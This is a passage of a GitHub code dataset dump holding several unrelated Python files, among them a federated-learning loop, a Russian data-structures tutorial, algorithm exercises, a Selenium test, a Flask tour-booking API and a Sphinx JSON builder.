Net\nNUM_EPOCHS = 300\nclients = []\n\nglobal_client = CifarClient(-1)\n\ndef initialize_clients(num_clients=3):\n\tprint(\"Initializing clients...\")\n\tfor i in range(num_clients):\n\t clients.append(CifarClient(i))\n\ndef evaluate_local_clients():\n\tprint(\"Evaluating clients...\")\n\tfor client in clients:\n\t print(client.evaluate(global_client.get_parameters()))\n\ndef train_local_clients():\n\tprint(\"Training clients...\")\n\tfor client in clients:\n\t\tclient.fit(global_client.get_parameters())\n\ndef aggregate_local_clients():\n\tprint(\"Aggregating clients...\")\n\tparams = None\n\tfor client in clients:\n\t\tclient_params = client.get_parameters()\n\t\tif params is None:\n\t\t\tparams = [cparam / len(clients) for cparam in client_params]\n\t\telse:\n\t\t\tfor param, cparam in zip(params, client_params):\n\t\t\t\tparam += cparam / len(clients)\n\t\t# print(\"CLIENT PARAMS\", client_params)\n\tglobal_client.set_parameters(params)\n\ninitialize_clients(NUM_CLIENTS)\nfor epoch in range(NUM_EPOCHS):\n\tprint(\"************* Epoch: {} *************\".format(epoch))\n\tevaluate_local_clients()\n\ttrain_local_clients()\n\taggregate_local_clients()\n","repo_name":"tsgoten/bcfl","sub_path":"clients/central.py","file_name":"central.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"35991324522","text":"from collections import OrderedDict, defaultdict, ChainMap\nfrom types import MappingProxyType\n\n# ---------------СЛОВАРИ---------------\n\n# OrderedDict - сохранит порядок следования ключей\n\nd = OrderedDict(one=1, two=2, three=3)\nd['четыре'] = 4\nprint(d)\n# OrderedDict([('one', 1), ('two', 2), ('three', 3), ('четыре', 4)])\n\n# collections .defaultdict — возвращает значения, заданные по умолчанию для отсутствующих ключей\ndd = defaultdict(list)\n# Попытка доступа к отсутствующему ключу его создает и\n# инициализирует, используя принятую по умолчанию фабрику, # то есть в данном примере list():\ndd['собаки'].append('Руфус')\ndd['собаки'].append('Кэтрин')\ndd['собаки'].append('Сниф')\nprint(dd['собаки'])\n# ['Руфус', 'Кэтрин', 'Сниф']\n\n# collections .ChainMap — производит поиск в многочисленных словарях как в одной таблице соответствия\ndict1 = {'один': 1, 'два': 2}\ndict2 = {'три': 3, 'четыре': 4}\nchain = ChainMap(dict1, dict2)\nprint(chain)\n# ChainMap({'один': 1, 'два': 2}, {'три': 3, 'четыре': 4})\nprint(chain['три'])\n# 3\nprint(chain['один'])\n# 1\n\n# types .MappingProxyType — обертка для создания словарей только для чтения\nwritable = {'один': 1, 'два': 2} # доступный для обновления\nread_only = MappingProxyType(writable) # Этот представитель/прокси с доступом только для чтения:\nprint(read_only['один'])\n# 1\n# read_only['один'] = 23\n# TypeError: \"'mappingproxy' object does not support item assignment\"\n# Обновления в оригинале отражаются в прокси:\nwritable['один'] = 42\nprint(read_only)\n# mappingproxy({'один': 42, 'один': 2})\n\n# -----------МАССИВЫ--------------\n# lis - динамически массив, структура следит за выделяемым объемео резервирования памяти при операция\n# удаления, добавления и вставки\nlist_ = [1, 2, 3]\n\n# кортежи не изменные тип данных\nmy_tuple = 1, 2, 3\nprint(my_tuple[0])\n# my_tuple[0] = 23\n# TypeError: 'tuple' object does not support item assignment\n\n# массивы - «типизированными массивами», ограниченными единственным типом данных. чтоявляется более пространственно\n# эффективным и позволяет хранить данные более плотно чем\nimport array\narr = array.array('f', (1.0, 0.5, 1.5, 2.0))\nprint(arr[1])\nprint(arr)\n# могут меняться\narr[1] = 3\nprint(arr)\narr.append(43)\nprint(arr)\n# # Массивы — это \"типизированные\" структуры данных:\n# arr[1] = 'привет'\n# TypeError: \"must be real number, not str\"\n\n# Строки - неизменяемы\narr = 'abcd'\n# arr[1] = 'e'\n# TypeError:\n# \"'str' object does not support item assignment\"\n\nprint(list(arr))\nprint(''.join(list(arr)))\n\n\n# bytes — неизменяемые массивы одиночных байтов\n# целых чисел в диапазоне 0 ≤ x ≤ 255\narr = bytes((0, 1, 2, 3))\nprint(arr[1])\n# 1\n# Байтовые литералы имеют свой собственный синтаксис:\nprint(arr)\nb'x00x01x02x03'\narr = b'x00x01x02x03'\n\n# # Байты неизменяемы:\n# >>> arr[1] = 23\n# TypeError:\n# \"'bytes' object does not support item assignment\"\n# >>> del arr[1]\n# TypeError:\n# \"'bytes' object doesn't support item deletion\"\n\n# bytearray — изменяемые массивы одиночных байтов\n# последовательность целых чисел в диапазоне 0 ≤ x ≤ 255\n\narr = bytearray((0, 1, 2, 3))\nprint(arr[1])\n# 1\n# Метод repr для bytearray:\nprint()\n# bytearray(b'x00x01x02x03')\n# Байтовые массивы bytearray изменяемы:\narr[1] = 23\nprint(arr)\n# bytearray(b'x00x17x02x03')\nprint(arr[1])\n# 23\n# Байтовые массивы bytearray могут расти и сжиматься в размере:\ndel arr[1]\narr.append(42)\nprint(arr)\nbytearray(b'x00x02x03*')\n# Байтовые массивы bytearray могут содержать только \"байты\"\n# # (целые числа в диапазоне 0 <= x <= 255)\n# >>> arr[1] = 'привет'\n# TypeError: \"an integer is required\"\n# >>> arr[1] = 300\n# ValueError: \"byte must be in range(0, 256)\"\n# # Bytearrays может быть преобразован в байтовые объекты: # (Это скопирует данные)\n# >>> bytes(arr)\n# b'x00x02x03*'\n\n# ----------------Записи и структуры----------------------\n# Рекомендации по структурам данных для органиазции записей:\n#\n# У вас есть всего несколько (2–3) полей: использование обыкновенного объекта-кортежа может подойти, если порядок\n# следования полей легко запоминается или имена полей излишни. Например, представьте точку (x, y, z) в трехмерном\n# пространстве.\n#\n# Вам нужны неизменяемые поля: в данном случае обыкновенные кортежи, collections.namedtuple и typing.NamedTuple,\n# дадут неплохие возмож ности для реализации этого типа объекта данных.\n#\n# Вам нужно устранить имена полей, чтобы избежать опечаток: вашими друзьями здесь будут collections.namedtuple и\n# typing.NamedTuple.\n#\n# Вы не хотите усложнять: обыкновенный объект-словарь может быть хорошим вариантом из-за удобного синтаксиса,\n# который сильно напоминает JSON. Или types .SimpleNamespace — причудливый атрибутивный доступ\n#\n# Вам нужен полный контроль над вашей структурой данных: самое время написать собственный класс с\n# методами-модификаторами (сеттерами) и методами-получателями (геттерами) @property.\n#\n# Вам нужно добавить в объект поведение (методы): вам следует на- писать собственный класс с нуля либо путем\n# расширения collections. namedtuple или typing.NamedTuple.\n#\n# Вам нужно плотно упаковать данные, чтобы сериализовать их для записи на жесткий диск или отправить их по Сети:\n# самое время навести справки по поводу struct.Struct, потому что этот объект представляет собой превосходный\n# вариант использования.\n\n# ----------МНОЖЕСТВА-------------\n# set\nvowels = {'а', 'о', 'э', 'и', 'у', 'ы', 'е', 'е', 'ю', 'я'}\nprint('э' in vowels)\n\n# frozenset — неизменяемые множества\nvowels = frozenset({'а', 'о', 'э', 'и', 'у', 'ы', 'е', 'е', 'ю','я'})\n# vowels.add('р')\n# AttributeError \"'frozenset' object has no attribute 'add'\"\n\n# Множества frozenset хешируемы и могут\n# использоваться в качестве ключей словаря:\nd = { frozenset({1, 2, 3}): 'привет' }\nprint(d[frozenset({1, 2, 3})])\n# 'привет'\n\n# collections .Counter — мультимножества\nfrom collections import Counter\ninventory = Counter()\nloot = {'клинок': 1, 'хлеб': 3}\ninventory.update(loot)\nprint(inventory)\n# Counter({'клинок': 1, 'хлеб': 3})\nmore_loot = {'клинок': 1, 'яблоко': 1}\ninventory.update(more_loot)\nprint(inventory)\nCounter({'клинок': 2, 'хлеб': 3, 'яблоко': 1})\n\nprint(len(inventory))\n# 3 # Количество уникальных элементов\nprint(sum(inventory.values()))\n# 6 # Общее количество элементов\n\n#-----------СТЭКИ LIFO------------\n# простые встроенные через list\nlist_ = []\nlist_.append(1)\nlist_.append(2)\nlist_.pop()\nlist_.pop()\n\n# collections .deque — быстрые и надежные стеки\n# Класс deque реализует очередь с двусторонним доступом, которая под- держивает добавление и удаление\n# элементов с любого конца за O(1) (неамортизируемое) время.\n\nfrom collections import deque\ns = deque()\ns.append('есть')\ns.append('спать')\ns.append('программировать')\nprint(s)\n# deque(['есть', 'спать', 'программировать'])\nprint(s.pop())\n# 'программировать'\ns.pop()\n# 'спать'\n\n# deque .LifoQueue — семантика блокирования для параллельных вычислений\n\nfrom queue import LifoQueue\ns = LifoQueue()\ns.put('есть')\ns.put('спать')\ns.put('программировать')\nprint(s)\n# \nprint(s.get())\n# 'программировать'\nprint(s.get())\n# 'спать'\nprint(s.get())\n# 'есть'\n# print(s.get_nowait())\n# raise queue.Empty\n# s.get()\n# Блокирует / ожидает бесконечно...\n\n\n# лучше всего использовать список list (append и pop) или\n# двустороннюю очередь deque.\n\n# --------------ОЧЕРЕДИ FIFO-----------------\n# list - ужастно мееееедленная очередь\nq = []\nq.append('есть')\nq.append('спать')\nq.append('программировать')\nprint(q)\n# ['есть', 'спать', 'программировать']\n# Осторожно: это очень медленная операция! О(n) - нужно сдвинуть все эелементы очереди\nq.pop(0)\n# 'есть'\n\n\n# ��о есть решение - collections .deque — быстрые и надежные очереди\n#\n# Класс deque реализует очередь с двусторонним доступом, которая под- держивает добавление и удаление элементов\n# с любого конца за O(1) (неамортизируемое) время. Поскольку двусторонние очереди одинаково хорошо поддерживают\n# добавление и удаление элементов с любого конца, они могут служить в качестве очередей и в качестве стеков1.\n\nfrom collections import deque\nq = deque()\nq.append('есть')\nq.append('спать')\nq.append('программировать')\nprint(q)\ndeque(['есть', 'спать', 'программировать'])\nq.popleft()\n# 'есть'\nq.popleft()\n# 'спать'\nq.popleft()\n# 'программировать'\n# q.popleft()\n# IndexError: \"pop from an empty deque\"\n\n# queue .Queue — семантика блокирования для параллельных вычислений\nfrom queue import Queue\nq = Queue()\nq.put('есть')\nq.put('спать')\nq.put('программировать')\nprint(q)\n# \nq.get()\n# 'есть'\nq.get()\n# 'спать'\nq.get()\n# 'программировать'\n# q.get_nowait()\n# queue.Empty\n# q.get()\n# Блокирует / ожидает бесконечно...\n\n# multiprocessing .Queue — очереди совместных заданий\n# Такая реализация очереди совместных заданий позволяет выполнять па- раллельную обработку находящихся\n# в очереди элементов многочисленны- ми параллельными рабочими процессами\n\nfrom multiprocessing import Queue\nq = Queue()\nq.put('есть')\nq.put('спать')\nq.put('программировать')\nprint(q)\n# \nq.get()\n# 'есть'\nq.get()\n# 'спать'\nq.get()\n# 'программировать'\n# q.get()\n# Блокирует / ожидает бесконечно...\n\n# Вывод: Если вы не ищете поддержку параллельной обработки, то реализация, предлагаемая очередью collections.deque,\n# является превосходным вариантом по умолчанию для реализации в Python\n\n# -----------------Очереди с приоритетом--------\n# Если list , тогда — поддержание сортируемой очереди вручную\n\nq = []\nq.append((2, 'программировать'))\nq.append((1, 'есть'))\nq.append((3, 'спать'))\n# ПРИМЕЧАНИЕ: Не забудьте выполнить пересортировку всякий раз,\n# когда добавляется новый элемент, либо используйте\n# bisect.insort(). q.sort(reverse=True)\nwhile q:\n next_item = q.pop()\n print(next_item)\n# Результат:\n# (1, 'есть')\n# (2, 'программировать')\n# (3, 'спать')\n\n# heapq — двоичные кучи на основе списка\n\nimport heapq\nq = []\nheapq.heappush(q, (2, 'программировать'))\nheapq.heappush(q, (1, 'есть'))\nheapq.heappush(q, (3, 'спать'))\nwhile q:\n next_item = heapq.heappop(q)\n print(next_item)\n# Результат:\n# (1, 'есть')\n# (2, 'программировать')\n# (3, 'спать')\n\n# queue .PriorityQueue — красивые очереди с приоритетом (на базе heapq)\nfrom queue import PriorityQueue\nq = PriorityQueue()\nq.put((2, 'программировать'))\nq.put((1, 'есть'))\nq.put((3, 'спать'))\nwhile not q.empty():\n next_item = q.get()\n print(next_item)\n# Результат:\n# (1, 'есть')\n# (2, 'программировать')\n# (3, 'спать')\n\n# Вывод: Реализация queue.PriorityQueue выбивается из общего ряда. Такая реализация должна быть предпочтительным\n# вариантом. Если требуется избежать издержек, связанных с блокировкой очере- ди queue.PriorityQueue,\n# то непосредственное использование модуля heapq\n\n\n","repo_name":"GizarIR/clearpython","sub_path":"struct_of_data.py","file_name":"struct_of_data.py","file_ext":"py","file_size_in_byte":15235,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72301013282","text":"# You're given two Linked Lists of potentially unequal length. Each Linked List represents a non-negative Integer, where each node in the Linked List is a digit of that integer, and the first node in each Linked List always represents the least significant digit of the integer. Write a function that returns the head of a new Linked List that represents the sum of the integers represented by the two input Linked Lists.\n\n# Each [LinkedList node has an integer [value] as well as a [next] node pointing to the next node in the list or to None/null if It's the tall of the list.\n\n# The value of each LinkedList node is always in the range of 6 - 9\n\n# Note: your function must create and return a new Linked List, and you're not allowed to modify elther of the Input Linked Lists.\n\n# This is an input class. Do not edit.\n\n# -------------Naive Solution | Incomplete | Runs in O(m+n) | Takes the same space too ------------------------\n\nclass LinkedList:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\ndef sumOfLinkedLists(linkedListOne, linkedListTwo):\n firstNumber = []\n while linkedListOne:\n firstNumber.append(linkedListOne.value)\n linkedListOne = linkedListOne.next\n firstNumber.reverse()\n firstNumber = [str(i) for i in firstNumber]\n \n secondNumber = []\n while linkedListTwo:\n secondNumber.append(linkedListTwo.value)\n linkedListTwo = linkedListTwo.next\n secondNumber.reverse()\n secondNumber = [str(i) for i in secondNumber]\n \n first = int(\"\".join(firstNumber))\n second = int(\"\".join(secondNumber))\n\n third = list(first + second)\n \n print(third)\n\n \n \n \n ","repo_name":"AsherThomasBabu/AlgoExpert","sub_path":"Linked List/Sum-of-Linked-Lists/naive.py","file_name":"naive.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"19811170822","text":"#!/usr/bin/env python3\n##!/usr/bin/python3\n##!/share/apps/python-3.4.3/bin/python3.4\n\n\"\"\"\n./main.py tournament\n\nThis program creates a round robin football tournament and prints the\ncurrent state of the groups.\n\nParameters\n----------\ntournament: str\n The name of the tournament.\n\nReturns\n-------\nprint on screen:\n Current state of the groups.\n\nExamples\n--------\n./main.py ElFutbolazo\n\n\"\"\"\nimport sys\nfrom Team import Team\nfrom Tournament import Tournament\nfrom TournamentGroup import Group\nfrom read_input import read_input\n\nif __name__ == \"__main__\":\n #Reads the name of the tournament from prompt\n if len(sys.argv) != 2: sys.exit('### ERROR: Choose a tournament')\n nfile = sys.argv[1]\n\n #Reads the tournament details, the groups and the teams from the input file\n [teams_and_groups, file_results, ppm] = read_input(nfile)\n allteams = []\n allgroups = []\n nallgroups = set([])\n ngroup = 'NG'\n for i in teams_and_groups:\n if i[0:4] == '': ngroup = 'NG'\n elif i[0:4] == '### ':\n ngroup = i[4:]\n nallgroups.add(ngroup)\n else:\n allteams.append(Team(i))\n allteams[-1].set_group(ngroup)\n pointspermatch = [2, 1, 0]\n for i in sorted(nallgroups):\n allgroups.append(Group(i, [team for team in allteams if team.group == i], ppm))\n\n #Creates the tournament\n tournament = Tournament(allgroups, file_results)\n tournament.update_results()\n tournament.print_groups()\n","repo_name":"rlugones/tournaments_football","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6902691968","text":"class Solution:\n \"\"\"\n @param nums: a sorted array\n @param a: \n @param b: \n @param c: \n @return: a sorted array\n \"\"\"\n def transform(self,i,a,b,c):\n return a*i*i+b*i+c\n def sortTransformedArray(self, nums, a, b, c):\n # Write your code here\n res=[0]*len(nums)\n if a>0:\n index=len(nums)-1\n i=0\n j=index\n while i<=j:\n ires=self.transform(nums[i],a,b,c)\n jres=self.transform(nums[j],a,b,c)\n if ires>jres:\n res[index]=ires\n i+=1\n else:\n res[index]=jres\n j-=1\n index-=1\n else:\n index=0\n i=0\n j=len(nums)-1\n while i<=j:\n ires=self.transform(nums[i],a,b,c)\n jres=self.transform(nums[j],a,b,c)\n if ires>jres:\n res[index]=jres\n j-=1\n else:\n res[index]=ires\n i+=1\n index+=1\n return res\n\n\n \n","repo_name":"Wanlingj/LeetCode","sub_path":"Google/Sorting and searching/Sort Transformed Array.py","file_name":"Sort Transformed Array.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40373396387","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom utils import copy_to_clipboard\n\n\n@copy_to_clipboard\ndef part1(recipe_count, take=10):\n stop_count = recipe_count + take\n return get_scores(stop_count=stop_count)[recipe_count:stop_count]\n\n\n@copy_to_clipboard\ndef part2(digits):\n return get_scores(digits=digits).index(digits)\n\n\ndef get_scores(**kwargs):\n scores = '37'\n elf1, elf2 = 0, 1\n count = len(scores)\n stop_count = kwargs.get('stop_count', 0)\n digits = kwargs.get('digits', '')\n tail = -len(digits) - 1\n while True:\n s1, s2 = int(scores[elf1]), int(scores[elf2])\n recipe = str(s1 + s2)\n scores += recipe\n count += len(recipe)\n elf1 = (elf1 + 1 + s1) % count\n elf2 = (elf2 + 1 + s2) % count\n if stop_count and count >= stop_count:\n break\n if digits and digits in scores[tail:]:\n break\n return scores\n\n\ndef main():\n assert part1(5) == '0124515891'\n assert part1(9) == '5158916779'\n assert part1(18) == '9251071085'\n assert part1(320851) == '7116398711'\n\n assert part2('01245') == 5\n assert part2('51589') == 9\n assert part2('92510') == 18\n assert part2('59414') == 2018\n assert part2('320851') == 20316365\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"slicklash/aoc","sub_path":"2018/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9605625494","text":"# encoding=utf-8\nimport unittest\nfrom HTMLTestRunner import HTMLTestRunner\nfrom selenium import webdriver\n\nclass Youdao(unittest.TestCase):\n\n def setUp(self):\n # self.driver = webdriver.Firefox()\n self.driver = webdriver.Chrome()\n # self.driver.implicitly_wait(10)\n self.base_url='http://www.youdao.com/'\n\n\n def test_youdao(self):\n driver = self.driver\n driver.get(self.base_url)\n driver.find_element_by_id(\"translateContent\").send_keys(\"http test0827.txt runner\")\n driver.find_element_by_id(\"translateContent\").submit()\n\n def tearDown(self):\n pass\n\nif __name__=='__main__':\n\n testsuite = unittest.TestSuite()\n testsuite.addTest(Youdao('test_youdao'))\n # 定义存放文件的路径\n fp = open('result.html','wb')\n runner = HTMLTestRunner(stream=fp,\n title='有道翻译测试报告',\n description='用例执行情况')\n runner.run(testsuite)\n fp.close()","repo_name":"xiaoloinzi/worksplace","sub_path":"GR1/selenuim/unittest/test_youdao_htmltestrunner.py","file_name":"test_youdao_htmltestrunner.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73994591843","text":"from flask import Blueprint, request\nfrom init import db\nfrom models.tour import Tour\nfrom models.tour_booking import TourBooking, tour_booking_schema\nfrom models.user import User\nfrom flask_jwt_extended import jwt_required, get_jwt_identity\nfrom controllers.decorator import authorise_as_tourist, admin_user_ID\nfrom sqlalchemy.sql import and_\n\ntour_bookings_bp=Blueprint('tour_bookings', __name__)\n\n# Tour booking route for viewing a tour booking - tour booking owner and tour owner only\n@tour_bookings_bp.route('/')\n@jwt_required()\ndef get_one_tourbooking(tour_id, booking_id):\n\n # Find the tour with id=tour_id\n tour_stmt = db.select(Tour).filter_by(id=tour_id)\n tour = db.session.scalar(tour_stmt)\n\n # Find the booking that links to the tour, matching it with booking_id \n booking_stmt = db.select(TourBooking).join(Tour).filter(and_(TourBooking.id==booking_id, Tour.id==tour_id))\n tour_booking = db.session.scalar(booking_stmt)\n \n # If the tour and related tour booking exist\n # Only the tourist and tour guide involved in this tour booking can view the booking\n if tour and tour_booking:\n if str(tour_booking.user_id) == get_jwt_identity() or str(tour.user_id) == get_jwt_identity():\n\n # If no conflicts with authorised users,\n # and the tour has matching booking with id=booking id, return the booking in the response\n return tour_booking_schema.dump(tour_booking)\n \n # If unauthorised users, return the error message\n else:\n return {'error': 'Only the tourist and tour guide relating to this tour booking can view.'}, 403\n \n # If the tour and related tour booking does not exist, return the error message\n else: \n return {'error' : f'Tour not found with id {tour_id} or Tour booking not found with id {booking_id}.'}, 404\n\n\n# Tour booking route for creating a tour booking - tourist only\n@tour_bookings_bp.route('/', methods=['POST'])\n@jwt_required()\n@authorise_as_tourist\ndef create_tourbooking(tour_id):\n # Load booking data from the request using schema to include data validation\n body_data = tour_booking_schema.load(request.get_json())\n\n # Find the tour with id=tour_id\n tour_stmt = db.select(Tour).filter_by(id=tour_id)\n tour = db.session.scalar(tour_stmt)\n\n # Check the user who is currently logged in \n # and match with user who has a current booking linked to the tour with id=tour_id\n current_user_id = get_jwt_identity()\n user_stmt = db.select(User).join(TourBooking).join(Tour).filter(and_(TourBooking.user_id==current_user_id, Tour.id==tour_id))\n user = db.session.scalar(user_stmt)\n\n # If the tour exists and is available\n if tour and tour.is_available == True:\n\n # Preventing booking duplicates by checking\n # if the current user already had a booking linked to the tour, return the error message\n if user:\n return {'error' : f'You have existing booking with tour of id {tour_id}.'}, 409\n \n # If no existing booking, create a new Booking model instance with data passed in from the request\n tour_booking = TourBooking(\n tourist_number=body_data.get('tourist_number'),\n preferred_language=body_data.get('preferred_language'),\n extra_request=body_data.get('extra_request'),\n user_id = get_jwt_identity(),\n tour=tour \n )\n\n # Add and commit new booking to the database\n db.session.add(tour_booking)\n db.session.commit()\n\n # Return the new booking in the response\n return tour_booking_schema.dump(tour_booking), 201\n \n # If tour does not exist or unavailable, return the error message\n else:\n return {'error' : f'Tour not found with id {tour_id}.'}, 404\n\n\n# Tour booking route for updating a tour booking - tour booking owner only\n@tour_bookings_bp.route('/', methods=['PUT', 'PATCH'])\n@jwt_required()\ndef update_one_booking(tour_id, booking_id):\n # Load booking data from the request using schema to include data validation\n body_data = tour_booking_schema.load(request.get_json(), partial=True)\n\n # Find the tour with id=tour_id\n tour_stmt = db.select(Tour).filter_by(id=tour_id)\n tour = db.session.scalar(tour_stmt)\n\n # Find the booking that links to the tour, matching it with booking_id \n booking_stmt = db.select(TourBooking).join(Tour).filter(and_(TourBooking.id==booking_id, Tour.id==tour_id))\n tour_booking = db.session.scalar(booking_stmt)\n\n # If the tour and related tour booking exists\n if tour and tour_booking:\n # Check if the user who is currently logged in is the booking owner\n if str(tour_booking.user_id) != get_jwt_identity():\n # If not, return the error message\n return {'error': 'Only the owner of the tour booking can edit.'}, 403\n \n # If it is the booking owner, update the database with the new data from the request\n tour_booking.tourist_number=body_data.get('tourist_number') or tour_booking.tourist_number\n tour_booking.preferred_language=body_data.get('preferred_language') or tour_booking.preferred_language\n tour_booking.extra_request=body_data.get('extra_request') or tour_booking.extra_request\n\n # Commit to the database\n db.session.commit()\n # Return the updated booking in the response\n return tour_booking_schema.dump(tour_booking)\n \n # If the tour has no matching tour booking with id=booking_id, return the error message\n else:\n return {'error' : f'Tour not found with id {tour_id} or Tour booking not found with id {booking_id}.'}, 404\n\n# Tour booking route for deleting a tour booking - tourist only\n@tour_bookings_bp.route('/', methods=['DELETE'])\n@jwt_required()\ndef delete_one_booking(tour_id, booking_id):\n\n # Find the tour with id=tour_id\n tour_stmt = db.select(Tour).filter_by(id=tour_id)\n tour = db.session.scalar(tour_stmt)\n\n # Find the booking that links to the tour, matching it with booking_id \n booking_stmt = db.select(TourBooking).join(Tour).filter(and_(TourBooking.id==booking_id, Tour.id==tour_id))\n tour_booking = db.session.scalar(booking_stmt)\n\n # If the tour and related tour booking exist\n if tour and tour_booking:\n\n # Check if the user who is currently logged in is the booking owner or admin user\n if str(tour_booking.user_id) == get_jwt_identity() or get_jwt_identity() == admin_user_ID():\n # If yes, delete the booking and commit to database\n db.session.delete(tour_booking)\n db.session.commit()\n return {'message' : f'Tour booking {tour_booking.id} deleted successfully.'}\n # If not, return the error message\n else:\n return {'error': 'Only the owner of the tour booking can delete.'}, 403\n\n # If the tour has no matching tour booking with id=booking_id, return the error message\n else:\n return {'error' : f'Tour not found with id {tour_id} or Tour booking not found with id {booking_id}.'}, 404","repo_name":"ellenpham/API-Webserver-LocalTourBooking","sub_path":"src/controllers/tourbooking_controller.py","file_name":"tourbooking_controller.py","file_ext":"py","file_size_in_byte":7113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73143207523","text":"from SisEqLin import SistemaEquacoes\n\n\n# Main\nmat2 = SistemaEquacoes(2)\nmat3 = SistemaEquacoes(3)\nmat4 = SistemaEquacoes(4)\nmat5 = SistemaEquacoes(5)\nmat6 = SistemaEquacoes(6)\nmat7 = SistemaEquacoes(7)\nmat8 = SistemaEquacoes(8)\nmat9 = SistemaEquacoes(9)\nmat10 = SistemaEquacoes(10)\nmat11 = SistemaEquacoes(11)\nmat12 = SistemaEquacoes(12)\nmat13 = SistemaEquacoes(13)\nmat14 = SistemaEquacoes(14)\nmat15 = SistemaEquacoes(15)\n","repo_name":"carlospadilha007/TrabalhoMC2","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"sq","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3686571138","text":"# -*- coding: utf-8 -*-\n\nimport urllib.parse\n\nfrom docutils import nodes\nfrom sphinx import addnodes\nfrom sphinx.builders.html import JSONHTMLBuilder\nfrom sphinx.util import jsonimpl\nfrom sphinx.util.osutil import relative_uri\nfrom .common import init_builder, derive_content_id\nfrom .envelope import Envelope\n\n\nTOC_DOCNAME = '_toc'\n\nclass DeconstSerialJSONBuilder(JSONHTMLBuilder):\n \"\"\"\n Custom Sphinx builder that generates Deconst-compatible JSON documents.\n \"\"\"\n\n implementation = jsonimpl\n name = 'deconst'\n out_suffix = '.json'\n\n def init(self):\n super().init()\n init_builder(self)\n\n self.toc_envelope = None\n\n def prepare_writing(self, docnames):\n \"\"\"\n Emit the global TOC envelope for this content repository.\n \"\"\"\n\n super().prepare_writing(docnames)\n\n self.toc_envelope = self._toc_envelope()\n if self.toc_envelope:\n self.dump_context(self.toc_envelope.serialization_payload(),\n self.toc_envelope.serialization_path())\n\n def handle_page(self, pagename, context, **kwargs):\n \"\"\"\n Override to call write_context.\n \"\"\"\n\n context['current_page_name'] = pagename\n self.add_sidebars(pagename, context)\n self.write_context(context)\n\n def finish(self):\n \"\"\"\n We need to write images and static assets *first*.\n\n Also, the search indices and so on aren't necessary.\n \"\"\"\n\n def write_context(self, context):\n \"\"\"\n Override the default serialization code to save a derived metadata\n envelope, instead.\n \"\"\"\n\n docname = context['current_page_name']\n per_page_meta = self.env.metadata[docname]\n\n local_toc = None\n if context['display_toc']:\n local_toc = context['toc']\n\n envelope = Envelope(docname=docname,\n body=context['body'],\n title=context['title'],\n toc=local_toc,\n builder=self,\n deconst_config=self.deconst_config,\n per_page_meta=per_page_meta,\n docwriter=self.docwriter)\n\n # Omit the TOC envelope. It's handled in prepare_writing().\n if self.toc_envelope and envelope.content_id == self.toc_envelope.content_id:\n return\n\n envelope.set_next(context.get('next'))\n envelope.set_previous(context.get('prev'))\n\n # If this repository has a TOC, reference it as an addenda.\n if self.toc_envelope:\n envelope.add_addenda('repository_toc', self.toc_envelope.content_id)\n\n self.dump_context(envelope.serialization_payload(),\n envelope.serialization_path())\n\n def _toc_envelope(self):\n \"\"\"\n Generate an envelope containing the TOC for this content repository.\n\n If the repository contains a document named \"_toc.rst\", render its\n entire doctree as the TOC envelope's body. Otherwise, extract the\n toctree from the repository's master document (usually \"index.rst\"),\n ignore any :hidden: directive arguments, and render it alone.\n\n URLs within the TOC are replaced with \"{{ to('') }}\"\n expressions. At page presentation time, these are replaced with the\n presented URL of the named envelope based on that envelope's current\n mapping.\n \"\"\"\n\n if '_toc' in self.env.found_docs:\n docname = '_toc'\n full_render = True\n includehidden = False\n else:\n docname = self.config.master_doc\n full_render = False\n includehidden = True\n\n doctree = self.env.get_doctree(docname)\n\n # Identify toctree nodes from the chosen document\n toctrees = []\n for toctreenode in doctree.traverse(addnodes.toctree):\n toctree = self.env.resolve_toctree(self.config.master_doc, self, toctreenode,\n prune=True,\n includehidden=includehidden,\n maxdepth=0)\n\n # Rewrite refuris from this resolved toctree\n for refnode in toctree.traverse(nodes.reference):\n if 'refuri' not in refnode:\n continue\n\n refstr = refnode['refuri']\n parts = urllib.parse.urlparse(refstr)\n\n if parts.scheme or parts.netloc:\n # Absolute URL\n continue\n\n target = \"{{ to('\" + derive_content_id(self.deconst_config, parts.path) + \"') }}\"\n if parts.fragment:\n target += '#' + parts.fragment\n\n refnode['refuri'] = target\n\n toctreenode.replace_self(toctree)\n\n toctrees.append(toctree)\n\n # No toctree found.\n if not toctrees:\n return None\n\n # Consolidate multiple toctrees\n toctree = toctrees[0]\n for t in toctrees[1:]:\n toctree.extend(t.children)\n\n # Render either the toctree alone, or the full doctree\n if full_render:\n self.secnumbers = self.env.toc_secnumbers.get(docname, {})\n self.fignumbers = self.env.toc_fignumbers.get(docname, {})\n self.imgpath = relative_uri(self.get_target_uri(docname), '_images')\n self.dlpath = relative_uri(self.get_target_uri(docname), '_downloads')\n self.current_docname = docname\n\n rendered_toc = self.render_partial(doctree)['body']\n else:\n # Include the wrapper
